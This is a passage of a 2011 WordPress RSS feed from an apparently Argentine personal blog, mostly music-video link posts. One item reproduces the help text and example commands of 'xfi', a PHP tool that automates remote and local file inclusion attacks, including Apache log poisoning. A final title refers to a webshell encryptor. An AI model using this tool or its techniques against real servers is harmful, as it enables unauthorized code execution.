<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/408/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/408/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/408/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/408/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/408/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/408/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/408/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/408/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/408/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/408/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/408/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/408/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/408/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/408/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=408&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/05/10/diccionario-con-nombres/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>
	</item>
		<item>
		<title>Decime la clave y ganate un peluche de&#8230; ok, no mas peluches gratis</title>
		<link>http://elrincondeseth.wordpress.com/2011/05/10/decime-la-clave-y-ganate-un-peluche-de-ok-no-mas-peluches-gratis/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/05/10/decime-la-clave-y-ganate-un-peluche-de-ok-no-mas-peluches-gratis/#comments</comments>
		<pubDate>Tue, 10 May 2011 04:49:32 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=406</guid>
		<description><![CDATA[http://xd-blog.com.ar/juego/3/<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=406&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://xd-blog.com.ar/juego/3/">http://xd-blog.com.ar/juego/3/</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/406/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/406/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/406/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/406/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/406/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/406/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/406/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/406/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/406/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/406/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/406/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/406/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/406/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/406/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=406&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/05/10/decime-la-clave-y-ganate-un-peluche-de-ok-no-mas-peluches-gratis/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>
	</item>
		<item>
		<title>Perón</title>
		<link>http://elrincondeseth.wordpress.com/2011/04/26/peron/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/04/26/peron/#comments</comments>
		<pubDate>Tue, 26 Apr 2011 18:52:40 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[/dev/urandom]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=402</guid>
		<description><![CDATA[http://www.youtube.com/watch?v=XwYSiCFRsuc http://www.youtube.com/watch?v=FkQtbTYpPlM&#38;feature=related http://www.youtube.com/watch?v=HGDUmWQY5_k&#38;feature=related http://www.youtube.com/watch?v=1dPt4ViR0eY&#38;feature=related http://www.youtube.com/watch?v=ogyRbEEH0es&#38;feature=related http://www.youtube.com/watch?v=jbgXGzzAlrE&#38;feature=related http://www.youtube.com/watch?v=IePVzHlnyEg&#38;feature=related<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=402&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.youtube.com/watch?v=XwYSiCFRsuc&amp;feature=youtu.be">http://www.youtube.com/watch?v=XwYSiCFRsuc</a><br />
<a href="http://www.youtube.com/watch?v=FkQtbTYpPlM&amp;feature=related">http://www.youtube.com/watch?v=FkQtbTYpPlM&amp;feature=related</a><br />
<a href="http://www.youtube.com/watch?v=HGDUmWQY5_k&amp;feature=related">http://www.youtube.com/watch?v=HGDUmWQY5_k&amp;feature=related</a><br />
<a href="http://www.youtube.com/watch?v=1dPt4ViR0eY&amp;feature=related">http://www.youtube.com/watch?v=1dPt4ViR0eY&amp;feature=related</a><br />
<a href="http://www.youtube.com/watch?v=ogyRbEEH0es&amp;feature=related">http://www.youtube.com/watch?v=ogyRbEEH0es&amp;feature=related</a><br />
<a href="http://www.youtube.com/watch?v=jbgXGzzAlrE&amp;feature=related">http://www.youtube.com/watch?v=jbgXGzzAlrE&amp;feature=related</a><br />
<a href="http://www.youtube.com/watch?v=IePVzHlnyEg&amp;feature=related">http://www.youtube.com/watch?v=IePVzHlnyEg&amp;feature=related</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/402/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/402/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/402/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/402/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/402/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/402/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/402/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/402/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/402/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/402/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/402/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/402/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/402/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/402/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=402&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/04/26/peron/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>
	</item>
		<item>
		<title>frenchitas</title>
		<link>http://elrincondeseth.wordpress.com/2011/04/15/frenchitas/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/04/15/frenchitas/#comments</comments>
		<pubDate>Fri, 15 Apr 2011 03:37:13 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=399</guid>
		<description><![CDATA[No, nada que ver, no voy a hablar de papas fritas de los 90, pero como ya escribí una banda de posts parecidos, no se que titulo ponerle. Turros bailando piola y spiderman bailando piola Habia una vez un vago que salia a la calle sin chumbo. El loco cantaba en su una bici, pero [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=399&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>No, nada que ver, no voy a hablar de papas fritas de los 90, pero como ya escribí una banda de posts parecidos, no se que titulo ponerle.</p>
<p><img src="http://a5.sphotos.ak.fbcdn.net/hphotos-ak-ash4/199395_191198724249487_100000780815064_406440_8163457_n.jpg" alt="" /></p>
<p><a href="http://www.youtube.com/watch?v=T4IINlRNAO4">Turros bailando piola</a> y <a href="http://www.youtube.com/watch?v=jTNQLr0Un4M">spiderman bailando piola</a><br />
Habia una vez un vago que <a href="http://www.youtube.com/watch?v=4JR_tYmjnZg">salia a la calle sin chumbo</a>. El loco cantaba en <del datetime="2011-04-15T02:56:00+00:00">su</del> una bici, pero  lo hacia para el orto porque en realidad su especialidad era filosofar sobre <a href="http://www.youtube.com/watch?v=Huc2PUq4N1A">los chetos</a>. No se que tiene que ver con esa historia, pero tenes que escuchar <a href="http://www.youtube.com/watch?v=yFjcNxIELjQ">shabba</a> <a href="http://www.youtube.com/watch?v=w6kQ2lhMLaA">ranks</a><br />
Ok, capaz que estás pensando &#8220;si no hay una guitarra no es música&#8221;. Te entiendo, asi que esto es para vos: <a href="http://www.taringa.net/posts/musica/10132275/Hermetica_-Especial-20-Anos-de-Acido-Argentino.html">El tano romano tocando ácido argentino en cual es el 13/4/2011</a>. Si te parece que el metal es para putos con tachas y cuero, mirá <a href="http://thechive.com/2011/04/13/dude-seriously-dont-brush-her-hair-in-knots-video/">el video de esta piba punk</a>&#8230; Bueno, no. Me dejé llevar por el título pero mas que punk es alguna de esas variedades chotas del metal.<br />
Me cansé de escribir boludeces, dejo links.<br />
El bidón: <a href="http://www.youtube.com/watch?v=2l-yeTs0keg&amp;feature=related">arriba de la mensa</a> (versión re loca mezclada con abarajame en la bañera, señor cobranza y puto), <a href="http://www.youtube.com/watch?v=r9_bwllgjXs">sucia</a> y <a href="http://www.youtube.com/watch?v=tWdJEyZk14U&amp;feature=related">tomando birra en lo de daniel</a><br />
<a href="http://www.youtube.com/watch?v=COV6OCIzF2s">Mayonesa &#8211; agachadita</a><br />
Karibe con k &#8211; ni idea el nombre del tema, pero deberia ser &#8220;<a href="http://www.youtube.com/watch?v=Tbe9S0ldpK0">pichones de locomia</a>&#8220;<br />
<a href="http://www.youtube.com/watch?v=wMG2-elFV2Y">Karibe con k &#8211; la pachanga </a>(si, es un cover de vilma palma. Demasiado groso)<br />
Lo mejor, lejos: <a href="https://www.youtube.com/watch?v=xtY1lAAZf7U">Warschawjanka</a> y <a href="https://www.youtube.com/watch?v=7G8QfBEm4jM&amp;feature=related">Varshavianka</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/399/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/399/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/399/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/399/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/399/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/399/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/399/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/399/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/399/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/399/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/399/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/399/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/399/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/399/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=399&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/04/15/frenchitas/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>

		<media:content url="http://a5.sphotos.ak.fbcdn.net/hphotos-ak-ash4/199395_191198724249487_100000780815064_406440_8163457_n.jpg" medium="image" />
	</item>
		<item>
		<title>xfi: RFI &amp; LFI automated explotation</title>
		<link>http://elrincondeseth.wordpress.com/2011/04/14/xfi-rfi-lfi-automated-explotation/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/04/14/xfi-rfi-lfi-automated-explotation/#comments</comments>
		<pubDate>Thu, 14 Apr 2011 23:24:05 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[PHP]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=392</guid>
		<description><![CDATA[DESCARGA ::~/php/xfi$ php xfi.php &#8211;help +&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-+ By seth: xd [-dot-] seth [.at.] gmail {~dot~} com http://xd-blog.com.ar/ v0.1 https://code.google.com/p/xfi/ +&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-+ Usage: php xfi.php [options] &#8211;url= Options: &#8211;no-rfi Doesn&#8217;t try to exploit RFI. &#8211;no-lfi Doesn&#8217;t try to exploit LFI. &#8211;no-inject-logs Doesn&#8217;t inject code in apache logs for exploiting LFI. &#8211;method L for lfi. R for rfi. Followed [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=392&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="https://code.google.com/p/xfi/downloads/detail?name=xfi-0.1.tar.gz&amp;can=2&amp;q=">DESCARGA</a></p>
<blockquote><p>::~/php/xfi$ php xfi.php &#8211;help<br />
+&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-+<br />
 By seth: xd [-dot-] seth [.at.] gmail {~dot~} com           http://xd-blog.com.ar/<br />
 v0.1                                                https://code.google.com/p/xfi/<br />
+&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-+</p>
<p>Usage: php xfi.php [options] &#8211;url= </p>
<p>Options:<br />
    &#8211;no-rfi            Doesn&#8217;t try to exploit RFI.<br />
    &#8211;no-lfi            Doesn&#8217;t try to exploit LFI.<br />
    &#8211;no-inject-logs    Doesn&#8217;t inject code in apache logs for exploiting LFI.<br />
    &#8211;method            L for lfi. R for rfi. Followed by exploit number. If ommited, will autodetect.<br />
    &#8211;help              function help(){help();}<br />
    &#8211;url               Url to attack.</p>
<p>Examples:<br />
    php xfi.php &#8211;url=&#8221;http://example.com/vuln.php?page=&#8221; id<br />
        Will try all methods to run id<br />
    php xfi.php &#8211;no-rfi &#8211;no-inject-logs &#8211;url=&#8221;http://example.com/vuln.php?page=&#8221; id<br />
        Will try only lfi without injecting code to the logs<br />
    php xfi.php &#8211;method=R8 &#8211;url=&#8221;http://example.com/vuln.php?page=&#8221; id<br />
        Will use the 8th RFI exploit (data: url with null byte in the end)</p>
</blockquote>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/392/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/392/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/392/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/392/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/392/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/392/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/392/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/392/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/392/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/392/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/392/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/392/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/392/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/392/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=392&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/04/14/xfi-rfi-lfi-automated-explotation/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>
	</item>
		<item>
		<title>I s2 pixels</title>
		<link>http://elrincondeseth.wordpress.com/2011/04/14/i-s2-pixels/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/04/14/i-s2-pixels/#comments</comments>
		<pubDate>Thu, 14 Apr 2011 04:40:49 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[Humor]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=388</guid>
		<description><![CDATA[Lo vi en un pin y me di cuenta de que lo tenia que postear acá<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=388&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Lo vi en un pin y me di cuenta de que lo tenia que postear acá</p>
<p><a href="http://skreened.com/zerotees/i-love-pixels"><img src="http://skreened.com/render-product/o/g/h/oghcxsjwoyrzuhaopvis/i-love-pixels.american-apparel-juniors-organic-tee.natural.w335h380z1.jpg" /></a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/388/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/388/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/388/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/388/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/388/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/388/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/388/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/388/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/388/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/388/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/388/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/388/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/388/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/388/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=388&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/04/14/i-s2-pixels/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>

		<media:content url="http://skreened.com/render-product/o/g/h/oghcxsjwoyrzuhaopvis/i-love-pixels.american-apparel-juniors-organic-tee.natural.w335h380z1.jpg" medium="image" />
	</item>
		<item>
		<title>Covers</title>
		<link>http://elrincondeseth.wordpress.com/2011/04/02/covers/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/04/02/covers/#comments</comments>
		<pubDate>Sat, 02 Apr 2011 05:57:35 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=384</guid>
		<description><![CDATA[Noche de covers, para vos basura Destruccion (Yo tengo un pedazo, cover v8) Gorra basura &#8211; antipoliticos (cover mala fama) (repetido, pero es alto tema) Todavia hay estúpidos que no escucharon esto Panic show &#8211; los lirios (probablemente el mejor tema del post) Como ali &#8211; la repandilla Droga &#8211; Supermerk2 (también es repetido) Un [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=384&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Noche de covers, para vos basura</p>
<p><a href="http://www.youtube.com/watch?v=KTvQHlDsJj4">Destruccion (Yo tengo un pedazo, cover v8) </a></p>
<p><a href="http://www.youtube.com/watch?v=ZTcP-PGiCbE">Gorra basura &#8211;  antipoliticos (cover mala fama)</a> (repetido, pero es alto tema)</p>
<p><a href="http://www.elsonar.com.ar/punkycacos">Todavia hay estúpidos que no escucharon esto</a></p>
<p><a href="http://www.youtube.com/watch?v=HHMaen11OtQ">Panic show &#8211; los lirios</a> (probablemente el mejor tema del post)<br />
<a href="http://www.youtube.com/watch?v=hcQ2EMbsjiI&amp;feature=related">Como ali &#8211; la repandilla</a><br />
<a href="http://www.youtube.com/watch?vkill=BYLmwrV4Oqs">Droga &#8211; Supermerk2</a> (también es repetido)<br />
<a href="http://www.youtube.com/watch?v=nRT-HpuUmds">Un poco de amor francés &#8211; Los del fuego</a><br />
<a href="http://www.youtube.com/watch?v=1HKsTm_hU3o&amp;feature=related">Aun Estas En Mis Sueños  &#8211; Los Del Fuego</a><br />
<a href="http://www.youtube.com/watch?v=ubSEiETzXyM&amp;feature=related">Persiana Americana  &#8211; Los del Fuego</a><br />
<a href="http://www.youtube.com/watch?v=m1qu_YVWIJI&amp;feature=youtu.be">De musica ligera &#8211; Los palmeras</a><br />
<a href="http://www.youtube.com/watch?v=vFhKwX96oV4&amp;feature=related">Los llamadores &#8211; La bomba loca</a><br />
<a href="http://www.youtube.com/watch?v=LTxvwnmu-Rw&amp;feature=related">La liga &#8211; Se dice de mi</a><br />
<a href="http://www.youtube.com/watch?v=8B1W1C5ORuc">Mil horas &#8211; Dedo verde</a><br />
<a href="http://www.youtube.com/watch?v=pyzx-CcqCDI&amp;feature=related">Mil horas &#8211; Altos cumbieros</a><br />
<a href="http://www.youtube.com/watch?v=Y9vw2jWK-ac">Una vela &#8211; repiola</a> (Otro tema zarpado)</p>
<p><a href="http://www.mediafire.com/?mtm0lejjy1a">covers cumbia.rar</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/384/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/384/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/384/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/384/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/384/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/384/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/384/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/384/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/384/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/384/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/384/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/384/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/384/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/384/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=384&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/04/02/covers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>
	</item>
		<item>
		<title>Encriptador de webshells</title>
		<link>http://elrincondeseth.wordpress.com/2011/03/24/encriptador-de-webshells/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/03/24/encriptador-de-webshells/#comments</comments>
		<pubDate>Thu, 24 Mar 2011 07:19:31 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
